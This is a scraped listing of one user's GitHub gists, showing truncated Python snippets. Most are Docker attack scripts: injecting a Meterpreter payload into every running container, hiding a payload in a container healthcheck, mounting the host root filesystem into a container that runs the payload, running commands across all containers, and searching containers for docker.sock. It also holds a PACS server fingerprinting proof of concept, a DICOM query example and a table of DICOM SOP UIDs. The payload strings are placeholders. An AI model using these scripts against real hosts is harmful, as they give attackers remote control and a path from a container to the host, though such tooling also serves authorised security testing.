Pasknel Ribeiro pasknel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| payload = "INSERT PYTHON METERPRETER PAYLOAD HERE" | |
| healthtest = ['CMD', 'python', '-c', payload] | |
| cmd = 'python -c "while True: import time; time.sleep(1)"' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| payload = "INSERT PYTHON METERPRETER PAYLOAD HERE" | |
| cmd = 'python -c "{0}"'.format(payload) | |
| volumes = { | |
| '/': { | |
| 'bind': '/host', |
pasknel
/ MeterpreterPython.py
Created
June 20, 2019 13:58
Run Python Meterpreter Payload in containers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| payload = "INSERT PYTHON METERPRETER PAYLOAD HERE" | |
| cmd = 'python -c "{0}"'.format(payload) | |
| for container in client.containers.list(): | |
| try: | |
| print "[*] Injecting meterpreter (python) in container: {0}".format(container.short_id) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| image = "alpine" | |
| c = client.containers.run(image, detach = True, tty = True) | |
| print "[+] New container created: {0} ({1})".format(c.short_id, c.name) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| cmd = "ls" | |
| for container in client.containers.list(): | |
| try: | |
| container_name = container.name | |
| result = container.exec_run(cmd) | |
| print "[*] Container: {0} - Output: \n{1}".format(container_name, result.output) |
pasknel
/ SearchDockerSock.py
Last active
June 20, 2019 02:41
Search for docker.sock in all containers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| for container in client.containers.list(): | |
| try: | |
| container_id = container.short_id | |
| container_name = container.name | |
| bits, stat = container.get_archive('/var/run/docker.sock') | |
| print "[+] Docker.sock found in container: {0} ({1})".format(container_id, container_name) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import docker | |
| client = docker.from_env() | |
| for container in client.containers.list(): | |
| print "[*] Container ID: {0}".format(container.short_id) | |
| print "[*] Container Image: {0}".format(container.image.tags[-1]) | |
| print "[*] Container Name: {0}".format(container.name) | |
| print "" |
pasknel
/ PacsUserInfo.py
Last active
March 15, 2018 18:35
PoC script to grab the implementation version from a PACS server
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pynetdicom3 import AE | |
| from pynetdicom3 import QueryRetrieveSOPClassList | |
| from pynetdicom3.pdu_primitives import ImplementationVersionNameNotification | |
| def handle_association(response): | |
| print("[+] Association Established!") | |
| scp_ae_title = response.responding_ae_title.strip() | |
| for element in response.user_information: | |
| if type(element) == ImplementationVersionNameNotification: | |
| version_name = element.implementation_version_name |
pasknel
/ DicomFindExample.py
Created
February 22, 2018 14:45
C-FIND request example with pynetdicom3 and pydicom
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pynetdicom3 import AE | |
| from pydicom.dataset import Dataset | |
| from pynetdicom3 import QueryRetrieveSOPClassList | |
| ae = AE(scu_sop_class = QueryRetrieveSOPClassList) | |
| ip = "IP ADDRESS HERE" | |
| port = 104 | |
| association = ae.associate(ip, port) |
pasknel
/ DICOM_SOP.csv
Created
February 13, 2018 22:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SOP UID | SOP Name | |
|---|---|---|
| 1.2.840.10008.1.1 | Verification SOP Class | |
| 1.2.840.10008.4.2 | Storage Service Class | |
| 1.2.840.10008.5.1.4.1.2.1.1 | Patient Root Query/Retrieve Information Model - FIND | |
| 1.2.840.10008.5.1.4.1.2.1.2 | Patient Root Query/Retrieve Information Model – MOVE | |
| 1.2.840.10008.5.1.4.1.2.1.3 | Patient Root Query/Retrieve Information Model – GET |